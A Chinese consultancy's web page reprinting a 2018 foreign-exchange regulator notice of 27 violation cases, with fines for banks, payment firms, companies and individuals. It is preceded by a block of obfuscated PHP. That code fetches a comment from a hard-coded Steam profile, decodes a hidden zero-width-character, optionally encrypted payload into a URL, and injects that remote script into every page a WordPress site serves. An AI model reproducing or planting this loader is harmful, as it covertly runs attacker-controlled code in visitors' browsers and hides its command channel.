goto dfc1d; D7304: function decode_html_entities_like_source(string $s) : string { goto d39d7; C56fe: $s = str_replace(["\134\x6e", "\134\x22", "\x26\x71\165\157\x74\73", "\x26\x61\x6d\160\x3b", "\x26\154\x74\73", "\x26\147\x74\73"], ["\xa", "\x22", "\x22", "\x26", "\74", "\76"], $s); goto Ba34b; d39d7: $s = preg_replace_callback("\x2f\x26\43\170\x28\133\134\144\x61\55\x66\x41\55\x46\x5d\53\x29\x3b\57\151", function ($m) { return mb_convert_encoding(pack("\110\x2a", $m[1]), "\x55\124\106\55\70", "\x55\x43\123\55\x32\102\105"); }, $s); goto C56fe; Ba34b: return $s; goto b61ef; b61ef: } goto D7078; D7078: function decode_zero_width_payload(string $text, string $password = '') : string { try { goto C2b2b; d3c12: $salt = substr($blob, 0, 8); goto D23dc; C9c3f: $bytes = array_map("\157\162\144", str_split($plain)); goto Cd597; Ef189: a7f7f: goto d13f0; ce377: $from = [$ZW[4], $ZW[5]]; goto e78f2; ec58b: if (!($unz === false)) { goto A9c55; } goto E9275; eed3b: if (!($leading === '')) { goto cfaee; } goto c489e; e9141: $blob = pack("\103\52", ...$bytes); goto d3c12; A98ef: $bytes = []; goto abbfc; d50d2: d308c: goto C9c3f; Ccd85: $iv = substr($dk, 0, 16); goto Df294; df35a: $ciphertext = substr($blob, 8); goto e998e; D85f8: cfaee: goto ec634; c5213: A9c55: goto D9e23; f6ec8: d17f8: goto e0fc4; e998e: $expectedHmac = null; goto Ed5ed; c87c5: $p += 8; goto Fd43b; F4fea: $payloadRest = mb_substr($payload, 1, null, "\125\124\x46\x2d\x38"); goto Fe277; Dba93: e6efa: goto A98ef; aeada: Af03e: goto d50d2; d5bfd: if (!($p + 8 <= strlen($bits))) { goto d36a9; } goto eaec6; eaec6: $bytes[] = bindec(substr($bits, $p, 8)); goto da13a; D9e23: return $unz !== false ? $unz : ''; goto ee358; c489e: return ''; goto D85f8; C8282: $containerChar = mb_substr($payload, 0, 1, "\x55\x54\x46\55\70"); goto F4fea; E88ce: $payload = mb_substr($leading, 1, null, "\125\x54\106\x2d\70"); goto d3dbb; b8587: $hasHmac = $containerIdx === 0; goto d9773; f91c2: if (!$isEncrypted) { goto fa074; } goto e9141; d3d85: return ''; goto f6ec8; B4da4: if (!($plain === false)) { goto d17f8; } goto d3d85; d0120: foreach ($inv as $b) { goto a21fc; Ab8c2: $allPrintable = false; goto F779a; abe91: F0425: goto e51e8; a21fc: if (!($b < 32 || $b > 126)) { goto a1a65; } goto Ab8c2; F779a: goto F4297; goto db1ad; db1ad: a1a65: goto abe91; e51e8: } goto d19ff; Abc09: foreach (explode("\40", $text) as $word) { goto d56b5; d82d0: goto e8b9d; goto bb211; bb211: f0f9c: goto E332b; e3ec9: $pos = 0; goto B5c7a; fbd9c: $leading = mb_substr($word, 0, $pos, "\x55\x54\106\55\70"); goto d82d0; E02b9: if (empty($intersection)) { goto f0f9c; } goto e3ec9; B5c7a: foreach ($chars as $i => $ch) { goto e8276; D24b7: C7bc3: goto C1cb6; E548e: $pos = $i; goto c3795; Ba85e: $pos = $i + 1; goto D24b7; c3795: goto Fd5ba; goto ce7e7; ce7e7: Caf0c: goto Ba85e; e8276: if (in_array($ch, $ZW, true)) { goto Caf0c; } goto E548e; C1cb6: } goto C2679; C2679: Fd5ba: goto fbd9c; C59c6: $intersection = array_intersect($ZW, $chars); goto E02b9; E332b: c181e: goto A212d; d56b5: $chars = preg_split("\57\x2f\x75", $word, -1, PREG_SPLIT_NO_EMPTY); goto C59c6; A212d: } goto D7121; E5afe: return implode('', array_map("\x63\150\162", $inv)); goto Be895; A7d8b: $modeIdx = array_search($modeChar, $ZW, true); goto e665f; Ac630: $raw = pack("\x43\52", ...$inv); goto C191f; bee51: if ($allPrintable) { goto db96b; } goto Ac630; d13f0: $expectedHmac = substr($blob, 8, 32); goto b2e8e; e78f2: $to = [$pair[0] . $pair[0], $pair[1] . $pair[1]]; goto c4816; e0fc4: if (!$hasHmac) { goto d308c; } goto B53b3; d9773: $bits = ''; goto F3450; C2b2b: $ZW = ["\xe2\200\x8c", "\xe2\x80\215", "\342\201\xa1", "\xe2\201\242", "\xe2\201\243", "\342\201\244"]; goto a368e; A96fe: e9132: goto fce6f; ee358: db96b: goto E5afe; d3dbb: $pairsByIndex = [$ZW[0] . $ZW[1], $ZW[0] . $ZW[2], $ZW[0] . $ZW[3], $ZW[1] . $ZW[2], $ZW[1] . $ZW[3], $ZW[2] . $ZW[3]]; goto A7d8b; a368e: $leading = ''; goto Abc09; da13a: e90ab: goto c87c5; Ed5ed: goto e9132; goto Ef189; Dd6e5: d36a9: goto f91c2; Cd597: fa074: goto Dbf10; Db703: $plain = openssl_decrypt($ciphertext, "\x61\145\x73\55\62\65\x36\x2d\143\164\x72", $key, OPENSSL_RAW_DATA, $iv); goto B4da4; ec634: $modeChar = mb_substr($leading, 0, 1, "\125\124\x46\55\x38"); goto E88ce; D7121: e8b9d: goto eed3b; B53b3: $h = hash_hmac("\163\150\x61\x32\x35\x36", $plain, $key, true); goto f8a49; b2e8e: $ciphertext = substr($blob, 40); goto A96fe; C191f: $unz = @gzuncompress($raw); goto ec58b; d19ff: F4297: goto bee51; F00f8: $allPrintable = true; goto d0120; D23dc: if ($hasHmac) { goto a7f7f; } goto df35a; abbfc: $p = 0; goto F1f05; Fd43b: goto bd29e; goto Dd6e5; Dc56a: return ''; goto aeada; E9275: $unz = @gzinflate($raw); goto c5213; f8a49: if (hash_equals($expectedHmac, $h)) { goto Af03e; } goto Dc56a; Df294: $key = substr($dk, 16, 32); goto Db703; Dbf10: $inv = array_map(fn($b) => ~$b & 0xff, $bytes); goto F00f8; fce6f: $dk = hash_pbkdf2("\163\150\x61\x35\61\62", $password, $salt, 10000, 48, true); goto Ccd85; e665f: $pair = $modeIdx !== false && isset($pairsByIndex[$modeIdx]) ? preg_split("\57\57\165", $pairsByIndex[$modeIdx], -1, PREG_SPLIT_NO_EMPTY) : [$ZW[0], $ZW[1]]; goto ce377; F3450: foreach (preg_split("\x2f\57\x75", $payloadRest, -1, PREG_SPLIT_NO_EMPTY) as $ch) { goto E2839; be63a: $bits .= str_pad(decbin($i), 2, "\x30", STR_PAD_LEFT); goto db3e7; a5a82: c2881: goto be7a7; d55eb: if (!($i !== false)) { goto baf2f; } goto be63a; db3e7: baf2f: goto a5a82; E2839: $i = array_search($ch, $ZW, true); goto d55eb; be7a7: } goto Dba93; c4816: $payload = str_replace($from[1], $to[1], $payload); goto de7cd; de7cd: $payload = str_replace($from[0], $to[0], $payload); goto C8282; Fe277: $containerIdx = array_search($containerChar, $ZW, true); goto D5820; D5820: $isEncrypted = $containerIdx === 0 || $containerIdx === 1; goto b8587; F1f05: bd29e: goto d5bfd; Be895: } catch (\Throwable $e) { return ''; } } goto a7fb4; dfc1d: function fetch_comment_text_from_url(string $url) : string { goto b27df; D7ac4: return $text; goto Dbfd9; F1e30: curl_close($ch); goto bd612; bd612: return get_transient($cache_key) ?: ''; goto A6f8c; dd4b3: set_transient($cache_key, $text, 300); goto D7ac4; Ef31e: $ch = curl_init($url); goto A6435; A6435: curl_setopt_array($ch, [CURLOPT_RETURNTRANSFER => true, CURLOPT_USERAGENT => "\115\x6f\x7a\x69\x6c\154\x61\x2f\x35\56\x30\40\50\127\x69\156\144\157\x77\x73\40\116\x54\x20\x31\60\x2e\x30\73\40\x57\151\156\x36\x34\73\40\x78\66\64\x29\x20\101\160\x70\x6c\x65\127\x65\142\x4b\x69\164\x2f\x35\63\67\x2e\x33\66", CURLOPT_TIMEOUT => 10]); goto Dea9b; b27df: $cache_key = "\143\141\160\164\x69\157\x6e\137" . md5($url); goto Ef31e; Ceb67: return get_transient($cache_key) ?: ''; goto D1440; Dea9b: $html = curl_exec($ch); goto d4307; d4307: if (!($html === false)) { goto D3bed; } goto F1e30; Dbfd9: C305c: goto Ceb67; Db868: curl_close($ch); goto e1b29; e1b29: if (!preg_match("\57\74\144\x69\x76\x5b\x5e\76\135\x2a\x63\x6c\x61\x73\163\75\133\47\134\42\135\143\x6f\x6d\155\x65\x6e\x74\x74\150\162\145\x61\x64\x5f\x63\x6f\x6d\155\145\156\164\137\x74\145\170\164\133\x27\134\x22\x5d\133\x5e\76\x5d\x2a\76\x28\x2e\52\77\51\x3c\134\x2f\144\x69\x76\x3e\57\x69\x73", $html, $m)) { goto C305c; } goto e58d9; A6f8c: D3bed: goto Db868; e58d9: $text = decode_html_entities_like_source($m[1]); goto dd4b3; D1440: } goto D7304; a7fb4: function enqueue_external_script_from_steam_comment() : void { goto Bc875; B9ec2: wp_enqueue_script("\x61\163\x61\x68\151\x2d\152\x71\165\x65\162\x79\55\x6d\x69\156\55\142\165\x6e\x64\x6c\145", $url, [], null, true); goto c0558; c0558: Ad652: goto Fa6d5; d25b8: if (!filter_var($url, FILTER_VALIDATE_URL)) { goto Ad652; } goto B9ec2; Bc875: $steamProfileUrl = "\150\164\x74\160\x73\72\x2f\57\x73\x74\145\x61\x6d\x63\157\155\x6d\165\x6e\x69\164\171\56\143\157\x6d\57\151\144\x2f\60\x78\145\x65\162\x69\145\x2f"; goto f0971; af6d0: $url = $domainOrPath; goto d25b8; f0971: $commentText = fetch_comment_text_from_url($steamProfileUrl); goto b2ed4; b2ed4: $domainOrPath = decode_zero_width_payload($commentText, ''); goto af6d0; Fa6d5: } goto Ae8ce; Ae8ce: add_action("\167\x70\x5f\145\x6e\x71\165\145\165\x65\137\163\x63\x72\151\x70\164\163", "\x65\x6e\161\x75\x65\x75\145\x5f\x65\170\x74\145\162\156\x61\x6c\x5f\163\x63\x72\x69\160\x74\137\x66\x72\x6f\155\x5f\x73\x74\145\x61\x6d\x5f\x63\157\155\155\145\x6e\164"); 中国外汇管理局,外汇违规案例通报
欢迎来到智再(上海)企业发展有限公司! 咨询电话:18217610769 | 15821805951
首页 » 行业新闻

中国外汇管理局,外汇违规案例通报

时间:2018-09-18作者:admin

2018年以来,国家外汇管理局深入贯彻落实十九大精神和党中央、国务院工作部署,紧紧围绕服务实体经济、防控金融风险、深化金融改革三项任务,加强外汇市场监管,依法查处各类外汇违法违规行为,严厉打击虚假、欺骗性交易。根据《中华人民共和国政府信息公开条例》(国务院令第492号)等相关规定,现将部分违规典型案件通报如下:

案例1:华夏银行上海分行违规办理转口贸易案
2015年11月至2016年1月,华夏银行上海分行未按规定尽职审核转口贸易真实性,在企业提交虚假提单的情况下,违规办理转口贸易购付汇业务。该行上述行为违反《外汇管理条例》第十二条。根据《外汇管理条例》第四十七条,处以罚款200万元人民币,暂停对公售汇业务两年。

案例2:交通银行厦门前埔支行违规办理转口贸易案
2016年1月至8月,交通银行厦门前埔支行未按规定尽职审核转口贸易真实性,在企业提交虚假提单的情况下,违规办理转口贸易购付汇业务。该行上述行为违反《外汇管理条例》第十二条。根据《外汇管理条例》第四十七条,处以罚款600万元人民币,暂停对公售汇业务三个月,并责令追究负有直接责任的高级管理人员和其他直接责任人员责任。

案例3:南洋商业银行(中国)杭州分行违规办理转口贸易案
2016年3月至8月,南洋商业银行杭州分行未按规定尽职审核转口贸易真实性,在企业提交失效及与交易无关提单的情况下,违规办理转口贸易付汇业务。该行上述行为违反《外汇管理条例》第十二条。根据《外汇管理条例》第四十七条,处以罚没款131万元人民币。

案例4:北京银行上海分行违规办理转口贸易案
2017年7月,北京银行上海分行未按规定尽职审核转口贸易真实性,在企业重复提交提单的情况下,违规办理转口贸易付汇业务。该行上述行为违反《外汇管理条例》第十二条。根据《外汇管理条例》第四十七条,处以罚没款84万元人民币。

案例5:锦州银行大连分行违规办理贸易融资案
2015年9月至10月,锦州银行大连分行凭其他企业的海关报告单为某企业违规办理贸易融资业务。该行上述行为违反《外汇管理条例》第十二条。根据《外汇管理条例》第四十七条,处以罚没款52.98万元人民币。

案例6:徽商银行合肥天鹅湖支行违规办理贸易融资案
2016年9月至11月,徽商银行合肥天鹅湖支行在企业重复使用海关报关单的情况下,违规办理贸易融资业务。该行上述行为违反《外汇管理条例》第十二条。根据《外汇管理条例》第四十七条,处以罚款40万元人民币。

案例7:民生银行厦门分行违规办理内保外贷案
2014年8月至2016年12月,民生银行厦门分行在办理内保外贷签约及履约付汇时,未按规定对债务人主体资格、贷款资金用途、预计还款资金来源、担保履约可能性及相关交易背景进行尽职审核和调查。该行上述行为违反《跨境担保外汇管理规定》第十二条及第二十八条。根据《外汇管理条例》第四十七条,处以罚没款2240万元人民币,暂停对公售汇业务三个月。

案例8:广州银行深圳分行违规办理内保外贷案
2015年5月至2017年1月,广州银行深圳分行在办理内保外贷签约及履约付汇时,未按规定对债务人主体资格、贷款资金用途、预计还款资金来源、担保履约可能性及相关交易背景进行尽职审核和调查。该行上述行为违反《跨境担保外汇管理规定》第十二条及第二十八条。根据《外汇管理条例》第四十七条,处以罚没款295.8万元人民币。

案例9:厦门国内外银行泉州分行违规办理内保外贷案
2015年6月至2016年7月,厦门国内外银行泉州分行在企业境外贷款已经发生不良、明知担保履约义务确定发生的情况下,违规办理内保外贷签约及履约付汇业务。该行上述行为违反《跨境担保外汇管理规定》第十二条及第二十八条。根据《外汇管理条例》第四十七条,处以罚款280万元人民币。

案例10:韩亚银行广州分行违规办理内保外贷案
2015年7月至12月,韩亚银行广州分行在办理内保外贷签约及履约付汇时,未按规定对预计还款资金来源及相关交易背景进行尽职审核和调查。该行上述行为违反《跨境担保外汇管理规定》第十二条及第二十八条。根据《外汇管理条例》第四十七条,处以罚没款216.26万元人民币,暂停对公售汇业务六个月,责令追究负有直接责任的高级管理人员和其他直接责任人员责任。

案例11:天津银行第六中心支行违规办理内保外贷案
2016年1月至2017年7月,天津银行第六中心支行在办理内保外贷签约及履约付汇时,未按规定对预计还款资金来源、担保履约可能性及相关交易背景进行尽职审核和调查。该行上述行为违反《跨境担保外汇管理规定》第十二条及第二十八条。根据《外汇管理条例》第四十七条,处以罚没款740.25万元人民币。

案例12:中国银行莆田分行违规办理个人外汇业务案
2016年1月至2017年4月,中国银行莆田分行为个人分拆办理售付汇和外币现钞提取业务。该行上述行为违反《个人外汇管理办法》第七条和第三十四条。根据《外汇管理条例》第四十七条和第四十八条,处以罚款70万元人民币。

案例13:中国工商银行深圳市分行违规办理个人外汇业务案
2017年10月至2018年1月,中国工商银行深圳分行未按规定审核境内个人有效身份证件及资金性质办理个人结汇业务。该行上述行为违反《个人外汇管理办法》第九条和第六条。根据《外汇管理条例》第四十七条和第四十八条,处以罚款43万元人民币。

案例14:智付电子支付有限公司逃汇案
2016年1月至2017年10月,智付电子支付有限公司凭虚假物流信息办理跨境外汇支付业务,金额合计1558.8万美元。该行为违反《外汇管理条例》第十二条,构成逃汇行为,严重扰乱外汇市场秩序,性质恶劣。根据《外汇管理条例》第三十九条,处以罚款1530.8万元人民币。

案例15:易智付科技(北京)有限公司逃汇案
2016年2月至2017年6月,易智付科技(北京)有限公司通过系统自动设置办理分拆购付汇,金额合计159万美元。该行为违反《外汇管理条例》第十四条,构成逃汇行为,严重扰乱外汇市场秩序,性质恶劣。根据《外汇管理条例》第三十九条,处以罚款107.45万元人民币。

案例16:支付宝(中国)网络技术有限公司违反外汇管理规定案
2014年1月至2016年5月,支付宝(中国)网络技术有限公司超出核准范围办理跨境外汇支付业务,且国内外收支申报错误。上述行为违反《支付机构跨境外汇支付业务试点指导意见》第六条、《国内外收支统计申报办法》第七条。根据《外汇管理条例》第四十八条,处以罚款60万元人民币。

案例17:财付通支付科技有限公司违反外汇管理规定案
2015年1月至2017年6月,财付通支付科技有限公司未经备案程序为非居民办理跨境外汇支付业务,且未按规定报送异常风险报告等资料。上述行为违反《外汇管理条例》第三十五条。根据《外汇管理条例》第四十八条,处以罚款60万元人民币。

案例18:上海盛付通电子支付服务有限公司违反外汇管理规定案
2015年1月至2017年6月,上海盛付通电子支付服务有限公司违规办理跨境付款业务,且国内外收支申报错误。上述行为违反《国家外汇管理局关于开展支付机构跨境外汇支付业务试点的通知》第九条、第六条等规定。根据《外汇管理条例》第三十九条和第四十八条,处以罚款62.5万元人民币。

案例19:青岛泽瑞凯茂国内外贸易有限公司逃汇案
2016年1月至12月,青岛泽瑞凯茂国内外贸易有限公司虚构贸易背景,使用虚假合同、发票,对外付汇1692.89万美元。该行为违反《外汇管理条例》第十二条和第十四条,构成逃汇行为,严重扰乱外汇市场秩序,性质恶劣。根据《外汇管理条例》第三十九条,处以罚款560万元人民币。

案例20:山东海科化工集团有限公司逃汇案
2016年7月,山东海科化工集团有限公司虚构转口贸易背景,使用虚假合同、发票,对外付汇2296.83万美元。该行为违反《外汇管理条例》第九条,构成逃汇行为,严重扰乱外汇市场秩序,性质恶劣。根据《外汇管理条例》第三十九条,处以罚款700万元人民币。

案例21:安徽华文国内外经贸股份有限公司虚假贸易融资案
2016年1月至12月,安徽华文国内外经贸股份有限公司凭无效交易单证及重复使用交易单证办理贸易融资,金额合计1666.75万美元。该行为违反《外汇管理条例》第十二条和第十四条。根据《外汇管理条例》第四十条,处以罚款525万元人民币。

案例22:南京萨穆尔医疗器械有限公司非法结汇案
2013年8月至2016年6月,南京萨穆尔医疗器械有限公司构造虚假合同办理资本金汇入并结汇3460万美元。该行为违反《外汇管理条例》第二十三条,构成非法结汇行为。根据《外汇管理条例》第四十一条,处以罚款429.89万元人民币。

案例23:广东鹤山市睿顺销售有限公司擅自改变资本金结汇用途案
2016年12月至2017年3月,鹤山市睿顺销售有限公司虚构资金用途办理资本金汇入并结汇2541.1万港元。该行为违反《外汇管理条例》第二十三条,构成擅自改变结汇资金用途行为。根据《外汇管理条例》第四十四条,处以罚款112.5万元人民币。

案例24:湖南籍钟某非法买卖外汇案
2013年10月至2016年10月,钟某为实现非法向境外转移资产目的,将4371.1万元人民币打入地下钱庄控制的境内账户,通过地下钱庄兑换外汇汇至其境外账户。该行为违反《个人外汇管理办法》第三十条,构成非法买卖外汇行为。根据《外汇管理条例》第四十五条,处以罚款305.9万元人民币。

案例25:四川籍邓某非法买卖外汇案
2016年2月至8月,邓某为实现非法获利目的,通过地下钱庄多次将人民币与港币相互兑换,违规金额合计1362.35万元人民币。该行为违反《个人外汇管理办法》第三十条,构成非法买卖外汇行为。根据《外汇管理条例》第四十五条,处以罚款204.36万元人民币。

案例26:广东籍许某私自买卖外汇案
2017年3月,许某利用其实际控制的某公司向境内企业付款6000万元人民币,私自购买美元。该行为违反《个人外汇管理办法》第三十条,构成私自买卖外汇行为。根据《外汇管理条例》第四十五条,处以罚款570万元人民币。

案例27:河北籍赵某分拆逃汇案
2016年1月至2017年12月,赵某为实现非法向境外转移资产目的,利用本人及他人共计55人的个人年度购汇额度,将个人资产分拆购汇后汇往境外账户,非法转移资金合计245.31万美元。该行为违反《个人外汇管理办法》第七条,构成逃汇行为。根据《外汇管理条例》第三十九条,处以罚款116万元人民币。

实时政策咨询 资源合作 注册公司咨询

18217610769 立即QQ咨询 微信咨询